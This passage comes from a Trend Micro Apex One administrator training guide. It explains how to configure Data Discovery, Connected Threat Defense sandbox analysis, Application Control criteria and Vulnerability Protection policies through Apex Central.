2 Click the Internal Agents or External Agents tabs as needed. Expand Apex One DLP and Apex
One Data Discovery settings and enable them as needed.

3 Click Add in the Apex One Data Discovery section to create a new Data Discovery rule.
4 Click to enable the rule and specify a unique name for the rule. Complete the tabs in the Data
Discovery Policy Settings window.

278 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Target Folder

• File location: Specify the folder to scan for files


• File Type Exceptions: Specify any file type scanning exceptions

Note: Data Discovery supports the following wildcard characters:


*: Substitute all characters before or after the *
?: Substitute for a single character or a single double-byte character

You can separate multiple entires with pipes ( | ) using the following format:
For files: *.<file_extension> (for example: *.exe|*.doc)
For folders: Specify a file path (for example: *\Test\*|C:\My-Docs\)

Template

Select any appropriate templates from the Available Templates list and then click Add to move
them to the Selected templates list.

© 2019 Trend Micro Inc. Education 279


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Actions

Specify one or more of the following: actions to perform when the policy is triggered
• Monitor: Detections are recorded for analysis
• Encrypt: Sensitive files are encrypted using one of the listed methods. Integration with
Trend Micro Endpoint Encryption is required to enable this capability.

Schedule

Configure a schedule for the scan.

Click Save to preserve the selections in Policy Settings, then Deploy to push the policy to the
identified endpoint computers.

280 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

5 The policy will display as Pending until it is deployed to the endpoints.

Once applied, the endpoint will display with a status of Deployed.


6 An alert on the endpoint will prompt the end user to restart the computer to complete the
process.

Incident Investigation
Data Leak Prevention incidents can be reviewed and updated by Data Leak Prevention compliance
officers and incident reviewers.

To enable the incident review process, Apex Central administrators will need to complete some
prerequisite tasks. These tasks are summarized below:
• Set up manager information in Active Directory
• Set up Active Directory integration to obtain user information
• Create user accounts specific for Data Leak Prevention incident investigation. Assign DLP
Compliance Officer or DLP Incident Reviewer roles to users investigating Data Leak
Prevention incidents (Remember that the DLP Compliance Officer and DLP Incident
Reviewer roles are available to Active Directory users only.)
• Set up the Scheduled incident summary and Incident details updated notifications
• Export Data Leak Prevention logs for auditing purposes

© 2019 Trend Micro Inc. Education 281


Lesson 14: Deploying Policies Through Trend Micro Apex Central

After competing the above steps, DLP investigators will be able to view Data Leak Prevention and
Data Discovery events from Apex Central by selecting Detections > Logs > Log Query.

282 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Lesson 15: Detecting Emerging Malware


Through Connected Threat
Defense
Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the components of the Connected Threat Defense system
• Integrate Deep Discovery Analyzer with Apex Central
• Track a suspicious object through the Connected Threat Defense cycle

In the modern data center, more and more security breaches are a result of targeted attacks using
techniques such as phishing and spear-phishing. In these cases, malware writers can bypass traditional
malware scanners by creating malware specifically targeted for your environment. Apex One adds
enhanced malware protection for new and emerging threats through Connected Threat Defense.

Using heuristic detection, Apex One can identify document files that are deemed suspicious and submit
them automatically to Deep Discovery Analyzer for analysis. If the analysis indicates that a particular file
does contain malware, Deep Discovery will provide the information to Apex Central where an action for
this particular malware can be specified. Apex One can use the Suspicious Object List from Apex Central
to update its malware policies and remediate threats.

Connected Threat Defense allows multiple Trend Micro products to share threat information and
analysis across multiple layers of protection critical to defending against advanced threats. Connected
Threat Defense includes a complete set of security technology to detect, respond to and protect against
for advanced threats.

RESPOND PROTECT

DETECT

© 2019 Trend Micro Inc. Education 283


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Detect
Components of the Connected Threat Defense detect advanced malware, behavior and
communications invisible to standard defenses. Connected Threat Defense analyzes the risk and
nature of the attack and attacker within sandboxes to reveal malicious actions without relying on
malware signatures.

Respond
Components of the Connected Threat Defense enable rapid response through shared threat
intelligence and delivery of real-time security updates.

Protect
Components of the Connected Threat Defense assess potential vulnerabilities and proactively
protect endpoints, servers and applications.

Visibility and control


Components of the Connected Threat Defense provide visibility across the system and analyze and
assess the impact of threats.

Apex One’s participation in Connected Threat Defense requires you to set up a connection between the
Apex One Server, Deep Discovery Analyzer and Apex Central.

Connected Threat Defense Requirements


To participate in the Connected Threat Defense lifecycle, verify that your environment meets these
requirements:
• Apex One Server is installed and configured with Security Agents protecting computers
• Deep Discovery Analyzer is installed and the sandbox virtual machines are provisioned
• Apex Central is installed
• Deep Discovery Analyzer and Apex One Server have been added to the Apex Central Managed
Servers list and Product Directory

284 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

How Connected Threat Defense Works


When all the components are deployed and configured correctly Connected Threat Defense operates as
described below.

Security Apex One Deep Discovery


Agent Server Analyzer Apex Central

 Ž 

’

Œ
‘

1 Security Agents are configured with rules to enable detection of malware on the protected
computers. Anti-Malware policies define how suspicious objects are to be handled.
2 Objects deemed to be suspicious are gathered and submitted to the Apex One Server.
Suspicious objects can include:
- Programs not known to Trend Micro downloaded through a web browser or email
channels
- Heuristic detections of processes downloaded through a web browser or email channels
- Low prevalence autorun programs on removable storage
3 The Apex One Server submits the suspicious objects to Deep Discovery Analyzer for analysis.
The objects are submitted to the Analyzer every 15 minutes by default.
4 Deep Discovery Analyzer executes and observes the suspicious file in a secure, isolated virtual
sandbox environment.
5 Deep Discovery Analyzer pushes the analysis results to Apex Central, where an action can be
specified for the file based on the analysis. The analysis report is pushed to Apex Central every
10 minutes by default. Once the action is specified, a list of emerging threats called a Suspicious
Object List is created or updated. Other Trend Micro products, such as Deep Security, Deep
Discovery Inspector or Deep Discovery Email Inspector, may also be connected to Apex Central
and be able to update the list.
6 The Apex One Server receives the list of suspicious objects from Apex Central. This list is
retrieved every 15 minutes by default.
7 The list is forwarded to Agents where protection against the suspicious object is applied.

© 2019 Trend Micro Inc. Education 285


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Suspicious Activities
Deep Discovery Analyzer monitors the sandbox environment for activities deemed to be suspicious.
The activities include the items listed below.

Deep Discovery Analyzer


Deep Discovery Analyzer provides custom sandbox analysis using virtual images that are tuned to
precisely match your system configurations, drivers, installed applications, and language versions. This
approach improves the detection rate of advanced threats that are designed to evade standard virtual
images. The custom sandbox environment includes safe external access to identify and analyze multi-
stage downloads, URLs, command and control (C&C), and more, as well as supporting manual or
automated file and URL submission.

Apex One can send these file types to Deep Discovery Analyzer:
• cell - Cell spreadsheet document
• chm - Compiled HTML file
• class - Java class file
• dll - Dynamic Link Library
• doc - Microsoft Word document
• docx - Microsoft Word 2007 and later document
• exe - Executable file
• gul - JungUm Global document
• hwp - Hancom Hangul Word Processor (HWP) document
• hwpx - Hancom Hangul Word Processor 2014 (HWPX) document
• jar - Java Applet Java application
• js - JavaScript file
• jse - JavaScript encoded script file
• jtd - JustSystems Ichitaro document

286 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

• lnk - Microsoft Windows Shell Binary Link shortcut


• mov - Apple QuickTime media
• pdf - Adobe Portable Document Format
• ppt - Microsoft PowerPoint presentation
• pptx - Microsoft PowerPoint 2007 and later presentation
• ps1 - Microsoft Windows PowerShell script file
• rtf - Microsoft Rich Text Format document
• swf - Adobe Shockwave Flash file
• vbe - Visual Basic encoded script file
• vbs - Visual Basic script file
• xls - Microsoft Excel spreadsheet
• xlsx - Microsoft Excel 2007 and later spreadsheet
• xml - Microsoft Office 2003 and later XML file

Connecting Deep Discovery Analyzer to Apex Central


The Deep Discovery Analyzer must be added as a Managed Server in Apex Central.
1 In the Apex Central Web Management console, click Administration > Managed Servers > Server
Registration.
2 Select Deep Discovery Analyzer from the Server Type list and click Add a product.

© 2019 Trend Micro Inc. Education 287


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

3 Type the details of the Deep Discovery Analyzer device and click Save.

4 Deep Discovery Analyzer is now listed as a Managed Server.

Adding Deep Discover Analyzer to the Apex Central Product


Directory
In the Apex Central Web Management console, add the Deep Discover Analyzer to the Product
Directories list.

288 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

1 In the Apex Central Web Management console, click Directories > Products and click Directory
Management.

2 Expand the New Entity folder. Drag the Analyzer device from New Entity folder to the previously
created Trend Micro Servers folder.

When prompted, click OK to acknowledge the move.

© 2019 Trend Micro Inc. Education 289


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

The Deep Discovery Analyzer should be displayed in the Trend Micro Servers folder.

Suspicious Objects
When Deep Discovery Analyzer discovers suspicious objects through the sandbox analysis of a file, it can
send information about the object (SHA-1, URL, IP, Domain) to Apex Central for local sharing. Apex
Central can also send the Suspicious Object List, along with executable files, to the Trend Micro Smart
Protection Network.

Trend Micro will validate the suspicious objects within a maximum of 6 hours. If suspicious objects are
found to be malicious they will be added to Smart Protection Network and all products which integrate
with the network can leverage this information.

Other Indicators of Compromise may also be manually configured and sent to Apex Central.

Trend Micro products, including Apex One and Deep Security, sync with Apex Central to obtain updated
Suspicious Object Lists.

The process for handling suspicious object can be broken down into the following phases:

Submitting Samples
Apex One and other Trend Micro products use administrator-configured file submission rules to
determine the samples to submit to Virtual Analyzer.

Analyzing Samples
Deep Discovery Analyzer tracks and analyzes the submitted samples. Analyzer flags suspicious
objects based on their potential to expose systems to danger or loss. Supported objects include files
(SHA-1 hash values), IP addresses, domains, and URLs.

290 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Distributing Suspicious Object Details


Apex Central consolidates suspicious objects and scan actions against the objects and then
distributes them to other products.
• Exceptions to Virtual Analyzer Suspicious Objects: Apex Central administrators can select
objects from the list of suspicious objects that are considered safe and then add them to an
exception list. Apex Central sends the exception list back to the products integrated with
Virtual Analyzer. If a suspicious object from a managed product matches an object in the
exception list, the product no longer sends it to Apex Central.
• User-Defined Suspicious Objects: Apex Central administrators can add objects they consider
suspicious but are not currently in the list of Virtual Analyzer suspicious objects.
• Suspicious Object Distribution: Apex Central consolidates Virtual Analyzer and user-defined
suspicious objects (excluding exceptions) and sends them to other managed products. These
products synchronize and use all or some of these objects.

Configure scan actions (log, block, or quarantine) against suspicious objects that affect computers.
Block and quarantine actions are considered active actions, while the log action is considered
passive. If products take an active action, Apex Central declares the affected computers as
mitigated. If the action is passive, computers are declared at risk.

Scan actions are configured separately for Virtual Analyzer and user-defined suspicious objects.
Apex Central automatically deploys the actions to certain managed products.

Mitigating Threats
Security Agents perform active scan actions against suspicious objects.

When the scan action configured in Apex Central and deployed to Security Agents is Block or
Quarantine, the affected computers are considered mitigated.

Apex Central also checks Web Reputation, URL filtering, network content inspection, and rule-based
detection logs received from all managed products and then compares them with its list of
suspicious objects. If there is a match from a specific computer and the managed product takes an
active action such as Block, Delete, Quarantine, or Override, Apex Central treats the computer as
mitigated.

Subscribing Apex One to the Suspicious Objects List


Apex One subscribes to the Suspicious Object List to retrieve the list on a regular basis.

© 2019 Trend Micro Inc. Education 291


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

1 In the Apex One Web Management console and click Administration > Settings > Suspicious
Object List.

In the Agent Settings section, verify that URL, IP and File and Domain are all enabled.
2 Click Test Connection. A success message should be displayed in the console window.

3 Click Save.
4 In the Agent Management list, right mouse-click a domain or an Agent and click Settings >
Sample Submission. Click to Enable suspicious file submission to Virtual Analyzer and click Save.

5 A message is displayed confirming the configuration settings have been applied.

292 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Tracking Suspicious Objects


Submissions from the Security Agents are sent to the Apex One Server before being forwarded to the
Deep Discovery Analyzer. The submitted items can be viewed on the Apex One Server before they are
sent to the Deep Discovery Analyzer in the following folder:
...\TEMP\Sample Submission

In the Deep Discovery Analyzer Web Management console, click Virtual Analyzer > Submissions. On the
Processing tab, any submitted files currently being processed by the Analyzer will be listed under
today's date. There will be some delay before the file is submitted to the Deep Discovery Analyzer by the
Apex One Server.

Once the submission has been processed, the entry will be displayed on the Completed tab. There
will be some delay while the file is processed.

© 2019 Trend Micro Inc. Education 293


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

Once the processing is complete, click Virtual Analyzer > Suspicious Objects. The object is now visible
in the list.

The details of the suspicious object are submitted to Apex Central for addition to the Suspicious
Objects List. In the Apex Central Web Management console click Administration > Threat Intel >
Virtual Analyzer Suspicious Objects to view the details in the list. You may need to wait several
minutes for the results of the analysis to be passed to Apex Central.

294 © 2019 Trend Micro Inc. Education


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

The action to be performed the next time the suspicious object is encountered can be configured.
Click to select the object in the list and click Configure Scan Action.

In the Scan Action window, select an action, for example, Block in the For selected files section and
click Apply.

When prompted, confirm the application of the scan action. Click Apply Scan Action.

© 2019 Trend Micro Inc. Education 295


Lesson 15: Detecting Emerging Malware Through Connected Threat Defense

The Scan Action is changed to Block.

Apex One will retrieve the Suspicious Object list from Apex Central on a regular basis. An
administrator can also trigger the retrieval of the list manually. In the Apex One Web Management
console, click Administration > Settings > Suspicious Object List.

Under Suspicious Object List Subscription section, click Syn Now.

The Security Agent will obtain the Suspicious Objects List from the Apex One Server on its next
update.

When the Security Agent encounters the suspicious object in the future, a suspicious file violation
will be displayed.

296 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Lesson 16: Blocking Unapproved


Applications on Endpoint
Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define Application Control criteria to specify allow or block actions
• Create Application Control policies

Apex One’s defense against malware and targeted attacks can be enhanced by preventing unwanted or
unapproved applications from executing on Windows endpoint computers. Administrators configure
policies and rules to define applications and then specify an operation of Allow or Block to be performed
on the defined applications when encountered on the endpoint computer.

Integrated Application Control NEW

Application Control functionality integrated into Apex One can monitor applications on an endpoint and
prevent unknown application from running. A separate Agent and Server are no longer needed to
provide Application Control capabilities.

If the separate Agent is in use for an existing OfficeScan XG installation, it will be automatically
uninstalled when Application Control policies are deployed and a new Apex One service will be launched
to integrate Application Control.

Policies using Apex One Application Control must be deployed through Apex Central.

Note: Application Control in Apex One is available for Windows endpoint computers only.

Lockdown Mode
When in Lockdown Mode, Security Agents block all applications not identified during an inventory scan.
After endpoints receive this command, Application Control scans the endpoint and creates a complete
application inventory. A hash value is calculated for every application on the computer, and the values are
stored in the invt.db file on the endpoint computer. Application Control then locks down the endpoint
and does not permit access to:
• Any application that does not specifically match Allow criteria defined in the User-defined Rule
table

© 2019 Trend Micro Inc. Education 297


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

• Any application that does not specifically match assessment criteria defined in the User-defined
Rule table
• Any application not found in the inventory scan results for that particular endpoint

As an option, applications from Trend Micro trusted vendors can be excluded from lockdown. Click this
option to automatically allow all applications that Trend Micro threat experts have determined to come
from trusted vendors.

Application Control Criteria


Application Control provides the ability to define criteria that specifically allows or blocks certain
applications to execute.

You can define Allow criteria to ensure that Application Control never blocks a certain application, or
you can create a complete list of applications allowed to execute on endpoints and then deploy a
Lockdown policy to the endpoints. While in Lockdown mode, users cannot execute, access, or install any
application that you did not include in the allow criteria.

You can define Block criteria to ensure that Application Control always blocks certain applications or you
can create Assessment criteria to monitor the applications that users access. Application Control logs all
applications that match the assessment criteria but takes no further action and allows the applications
to execute normally.

Application Control Criteria defines applications through the following attributes:


• File Hash
• File Path
• Certificate
• Certified Software Pattern
• Gray Software

File Hash
Every file, including an application, has a unique hash value. For example, notepad.exe has the
following hash values:
• SHA-1 value: 867B54F1BC5B71045A9A00BACA485A24176B202C
• SHA-256 value:
899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7

Application Control can use these hash values (either the SHA-1 or SHA-256 result) as the basis for
identifying an application on which to perform the Allow or Block operation.

In creating a Hash rule, there are two input methods:


• Manual
• Import

298 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Manual Input

Manual input allows administrators to enter the SHA-1 or SHA-256 values for identified
applications. The list cannot contain a mixture of SHA-1 and SHA-256 formats, and
administrators can manually specify up to 20 hash values with their description.

Import

This method uses the results from the Hash Generation Tool to identify the applications on the
endpoint. The Hash Generator Tool scans and creates a SHA-256 hash value list of all portable
executable (application) files found on an endpoint. You can then import the hash value list into
Application Control rules to specifically allow the execution of all identified applications. The
hash value file can also be created manually, following the appropriate format. A sample CSV file
can be downloaded directly from the Hash Values Criteria settings window,

Typically, the Hash Generator Tool is run on the golden image of the endpoint computer to build
a common baseline for creating an allow criteria with the known good application inventory.

© 2019 Trend Micro Inc. Education 299


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

This method only supports SHA-256 hashes and the file import has a maximum size of 4MB.
Each criteria only accepts one file; if a new file is imported, all existing hashes are overwritten.

The Hash Generation tool (TMiACHashGen.exe) can be downloaded directly from the Hash
Values Criteria settings window, or directly from the following URL:
https://success.trendmicro.com/solution/1120385

Alternately, the hash file can be created manually in a CSV file with the appropriate formatting.
A CSV sample file can also be downloaded from the Hash Values Criteria settings window.

File Paths
You can configure Application Control to specifically target certain directory locations based on
absolute path, storage type, and Perl Compatible Regular Expressions (PCRE).

File paths can include any of the following


• Specific path: Only applies to applications in the exact path specified
• Any built-in storage: Only applies to applications in the path specified and stored on an
internal storage device (internal hard disk drive)
• Any local storage: Only applies to applications in the path specified and stored on a non-
removable local storage device (internal or external hard disk drive)
• Any removable storage: Only applies to applications in the path specified and stored on a
removable storage device (USB drive, CD/DVD)

300 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

• Network path: Only applies to applications in the path specified and stored on a shared
network resource
• Program file folders: Only applies to applications in the path specified and stored in the
Program Files folders (default folders C:\Program Files and C:\Program Files
(x86))
• System volume: Only applies to applications in the path specified and stored in the default
Windows system drive

File paths can includes regular expressions and wildcards.

Digital Certificates
Applications typically include a digital signature for file integrity purposes. The digital signature
includes the digital certificate of the issuer and contains details such as the issuer name and validity
details.

© 2019 Trend Micro Inc. Education 301


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

You can configure Application Control to specifically target applications based on the trust level of a
certificate and contain specific certificate attributes. Select the type of certificate trust level and
then specify the required certificate Issuer or Subject information. These Certificate properties can
be retrieved from the Certificate Details.

The trust level combinations for Allow and Block criteria using Certificates differ.

Allow Criteria
• Trusted (valid): You have included the certificate in the trusted certificates list and the
certificate must not have expired
• Trusted (expired): You have added the certificate in the trusted certificates list but the
certificate has already expired
• Untrusted: The certificate is unknown or you did not add the certificate to the trusted
certificates list

Block Criteria
• Untrusted: The certificate is unknown or you did not add the certificate to the trusted
certificates list
• Untrusted/Trusted (expired): The certificate is unknown or you have added the certificate in
the trusted certificates list but the certificate has already expired
• Untrusted/Trusted (valid or expired): The certificate is unknown or you must have added the
certificate in the trusted certificates list but the certificate has already expired or is still valid

302 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

The certificate properties required can be retrieved from the Windows Certificate Details window.

© 2019 Trend Micro Inc. Education 303


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Certified Safe Software List


The Trend Micro Certified Safe Software List is a list of known applications that includes popular
operating system files, binaries files, applications for desktops, servers and mobile devices. This list
is categorized according to the applications features and can be searched by Vendor or Application
name. Administrators can select from these categories to create a rule. Trend Micro periodically
provides updates to the list through the Certified Safe Software Pattern.

To search for a vendor name, select Vendors and type in the name of the vendor in the search field.
To search for a application name, select Applications and type in the name of the application in the
search field.

The Trend Micro Certified Safe Software pattern requires an update when being use for the first
time. A manual update can be performed through the Web Management console.

You can search for applications by typing the name of Vendors or Applications. Select applications
using the data provided.
• Application: The name of the application
• AIR Score: A comprehensive security score based on an application's popularity and
reputation
• Global Usage: The global prevalence of the application. Click the prevalence to view a
regional breakdown of the application usage.

304 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Gray Software List


The Gray Software List contains applications that may be malicious if not used properly. Trend Micro
recommends blocking or monitoring applications in the Gray Software List to ensure that your
network remains secure.

Once Certified Safe Software List pattern is downloaded, it will automatically create a default rule
called Default Criteria - Assess Gray Software List Applications. This criteria type cannot be deleted.
It is configured by default on Block (Assessment) mode which means that even if the application is
executed on the endpoint it will not be blocked, but a detection log will be generated.

© 2019 Trend Micro Inc. Education 305


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Click the Default Criteria - Assess Gray Software List Applications criteria to view the items on the
list.

Implementing Application Control


Application Control policies are deployed through Apex Central. The steps involved in implementing
Application Control protection on endpoint computers involve the following:
1 Defining the Application Control Criteria
2 Creating the policy including Application Control protection
3 Specifying the Security Agents that will be implementing the policy
4 Deploying the policy

Defining the Application Control Criteria


In Apex Central, click Click Policies > Application Control Criteria. A single default criteria is
displayed. The Assess Gray Software List Applications criteria will be displayed by default when the
Certified Safe Software List Pattern is downloaded. This insures that the applications on this list are
blocked by default.

306 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Click Add Criteria and select the option to Allow or Block the defined applications.

Use following attributes to define the applications to Allow or Block.


• File Hash
• File Path
• Certificate
• Certified Software Pattern

Creating the Policy


In the Apex One Web Management console, click Policy > Policy Management. In the Product list,
select Apex One Security Agent and click Create or Create one now to define a new policy.

© 2019 Trend Micro Inc. Education 307


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Expand the Application Control Settings section and click to enable Application Control.

Click the All user accounts rule. The Application Control Criteria are displayed in the Available
criteria column.

308 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Click each criteria required one at a time and click μ to move them into the Selected criteria column
and click OK.

© 2019 Trend Micro Inc. Education 309


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Specifying the Security Agents That Will be Implementing the


Policy
In the Targets section of the policy, use Filter by Criteria or Specify Target(s) to identify which
Security Agents will be implementing the Application Control policy.

310 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Deploy the policy


Once the targets and policy settings have been defined, scroll down to the bottom of the list and
click Deploy.

The policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents.

5 Once applied to the target endpoints, the policy will display with a status of Deployed.

© 2019 Trend Micro Inc. Education 311


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

User-based Application Control


User-based Application Control is available if you have integrated Active Directory. If you do not have
Active Directory integration, you can only assign rules to the default All user accounts rule.

You can only assign 30 users or groups per rule. Create additional rules if you need to assign a greater
number of users to a policy.

User Accounts: Specify the Active Directory user accounts or groups to which you want to assign the
specific Application Control criteria,

Criteria: Move the necessary criteria from the Available list to the Selected list.

312 © 2019 Trend Micro Inc. Education


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

Best Practices for Enabling Application Control


The following are some recommended best practices when configuring Application Control in Apex One.

Use Learn ¬ Monitor ¬ Refine


1 An Application Control Block criteria with the match method set to Gray Software List is created
by default. Enable all categories in this list and enable assessment mode. Violations are logged,
but the application are not yet blocked.
2 Monitor the Application Monitoring violations manually, using the Top Blocked Applications
widget or by running a Log Query.
3 Refine the criteria and approve recognized software by unselecting categories from the Gray
Software list and create Allow criteria to exempt from screening.

Use Lockdown
Lockdown is suitable for organizations which do not have frequent software changes or those who
want to limit user access to certain application only. Recommended practices include:
• Create an Allow rule for Windows Update when enabling this setting
• Create a Golden Image of the endpoint after all applications have been installed or updated
before enabling this setting.
• Deploy this setting gradually on a few endpoints before fully implementing the lockdown to a
larger group.
• Enabling Exclude applications by Trend Micro trusted vendors is highly recommended in
lockdown scenarios.

In-house Applications
In-house applications should be added to Allow rules using Hash Values as the Application Control
criteria.

Top Blocked Applications Widget


To fine-tune Application Control policy enable the Top Blocked Applications Dashboard Widget. This
widget will help Administrators to identify applications that are commonly blocked in their network.

Trust Permissions
Consider the following before changing the Allow trust permissions to Applications can execute
other processes or Inheritable execution rights (not recommended).
• Apply these permissions only to specific application that requires them to avoid granting
extended rights to other applications that do not need it.
• Never use these permissions on web client applications like Internet Explorer, Chrome or
Firefox to avoid exposing the endpoint to Drive-by Download exploits.

© 2019 Trend Micro Inc. Education 313


Lesson 16: Blocking Unapproved Applications on Endpoint Computers

• These permissions are not recommended for File Path Allow rules as the specified folder
location may be granting extended execute rights to unintended applications.

Application Control Criteria Pros and Cons

Criteria Pro Con Best Practice


- Requires some time to
- Categorizing by features monitor the detection log to
Certified Safe
- Less decision making see which software are Learn ¬ Monitor ¬
Software List Refine
required actually the ones to allow or
block
- Requires some time to
- Pre-filtered list monitor the detection log to
Gray
- Less decision making see which software are Learn ¬ Monitor ¬
Software Refine
required actually the ones to allow or
block
- Software might have
different versions and/or Allow or block the
- Direct criteria to allow or
File Hash different platforms specific application
block the specific file - Regular maintenance directly
required
- Any files under that path will
- Direct criteria to allow or follow the criteria Apply it with other
File Path block the files under certain - If a software places files into big-scope allow/block
path multiple folders, it needs criteria
some configuration
- All of the products by that
- Easily allow or block all the company will apply the Apply to the
Certificate files of the companies by criteria. No middle ground. trustworthy or bad
using digital signature - Not all of the software has reputation companies
digital signature

314 © 2019 Trend Micro Inc. Education


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Lesson 17: Protecting Endpoint


Computers From
Vulnerabilities

Lesson Objectives:

After completing this lesson, participants will be able to:


• Create policies implementing Vulnerability Protection on Windows endpoint computers

Intrusion Prevention (IPS) functionality in Apex One protects Windows endpoint computers from being
exploited through operating system vulnerability attacks. It automates the application of virtual patches
to the endpoint computers which remain in place until an official patch to an operating system
vulnerability to become available.

Note: Vulnerability Protection in Apex One is available for Windows endpoint computers only.

Integrated Vulnerability Protection NEW

Intrusion Prevention (IPS) functionality is integrated into Apex One through Vulnerability Protection. A
separate Vulnerability Protection Agent and Server are no longer needed to provide Vulnerability
Protection capabilities.

If the separate Agent is in use for an existing OfficeScan XG installation, it will be automatically
uninstalled when Vulnerability Protection policies are deployed and a new Apex One service will be
launched to integrate Vulnerability Protection.

Policies using Apex One Application Control must be deployed through Apex Central.

To streamline assignment of Intrusion Prevention rules, Vulnerability Protection in Apex One operates in
one of two priority modes:
• Performance priority: Performance priority uses a subset of Intrusion Prevention Rules to
conserve network resources. These are the rules recommended to be applied when Agent
performance is of high importance.
• Security priority: Security priority uses the full set of Intrusion Prevention Rules but requires
additional network resources. These rules provide complete protection and this mode is
designed for users with higher security awareness.

© 2019 Trend Micro Inc. Education 315


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Note: Recommendation Scans are no longer used with Vulnerability Protection. Instead, Intrusion
Prevention Rules are derived from the priority mode assigned and are based on Trend Micro’s
analysis of operating system vulnerabilities.

Vulnerability Protection Pattern


The Vulnerability Protection Pattern used by Apex One contains the Intrusion Prevention Rules
recommended by Trend Micro, based on in-depth analysis of operating system vulnerabilities. This
pattern is released weekly or more often depending on the urgency of some vulnerabilities. Intrusion
Prevention Rules deployed to the Security Agents through the pattern will examine the actual content
and sequences of network packets. Based on the conditions set within the Rule, various actions are then
carried out on these packets, including dropping the packets or resetting the connection.

When the Vulnerability Protection Pattern is downloaded to the Apex One Server, the pattern is saved
and decoded. The decoded rules are displayed in the list of Intrusion Prevention Rules. Each rule includes
information such as Name, Application Type, Severity and CVE. Search can be used to filter this list.

316 © 2019 Trend Micro Inc. Education


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Vulnerability Protection Rules


After enabling Vulnerability Protection for a domain, select the required priority mode and the rules
used by that mode are displayed.

Note: The list of rules used in a particular priority mode are not configurable, they are assigned to the
mode by Trend Micro engineers.

Displayed columns include:


• Identifier: This column displays a unique numeric code assigned to the rule by Trend Micro.
• Name: This column displays short description of the rule, for naming purposes.
• Application Type: This column identifies the operating system component that requires the
rule.
• Severity: This column displays one of four possible rule severity levels: Low, Medium, High,
or Critical.
• Mode: Intrusion Prevention rules can operate in either Prevent or Detect modes. Detect
mode rules generate log entries when triggered, but do not drop the packets or reset the
connection. Prevent mode rules will enforce the action assigned to them.
• Type: This column identifies the type of rule, whether Exploit, Vulnerability or Smart. Exploit
rules are used to protect against specific exploits in a one-to-one relationship. Vulnerability
rules protect against multiple exploits and Smart rules protect against multiple
vulnerabilities.
• CVE: This column list the globally unique Common Vulnerability and Exploit identifier.

© 2019 Trend Micro Inc. Education 317


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

• Microsoft: This column lists the Microsoft Common Vulnerabilities and Exposures (CVE)
identifier.
• CVSS Score: This column displays the Common Vulnerability Scoring System score which
can then be translated into a qualitative representation (such as low, medium, high, and
critical) to help organizations properly assess and prioritize their vulnerability management
processes. CVSS is a published standard used by organizations worldwide.
• Last Updated: This column displays the date when the rule was last updated.

Columns can be sorted by clicking the column header. The list of rules can also be searched by
typing a string in the Search box at the top of the list.

Implementing Vulnerability Protection


Vulnerability Protection policies are deployed through Apex Central. The steps involved in implementing
Vulnerability Protection protection on endpoint computers include the following:
1 Creating the policy including Application Control protection
2 Specifying the Security Agents that will be implementing the policy
3 Deploy the policy

Creating the Policy


In the Apex One Web Management console, click Policy > Policy Management. In the Product list,
select Apex One Security Agent and click Create or Create one now to define a new policy.

318 © 2019 Trend Micro Inc. Education


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Expand the Vulnerability Protection Settings section and click to enable a Priority Mode of either
Performance priority or Security priority.

Specifying the Security Agents That Will be Implementing the


Policy
In the Targets section of the policy, use Filter by Criteria or Specify Target(s) to identify which
Security Agents will be implementing the Application Control policy.

© 2019 Trend Micro Inc. Education 319


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Deploy the policy


Once the targets and policy settings have been defined, scroll down to the bottom of the list and
click Deploy.

The policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents.

4 Once applied to the target endpoints, the policy will display with a status of Deployed.

320 © 2019 Trend Micro Inc. Education


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Network Engine Settings


The Network Engine Settings tab allows the selection of the Network Engine detection mode. There are
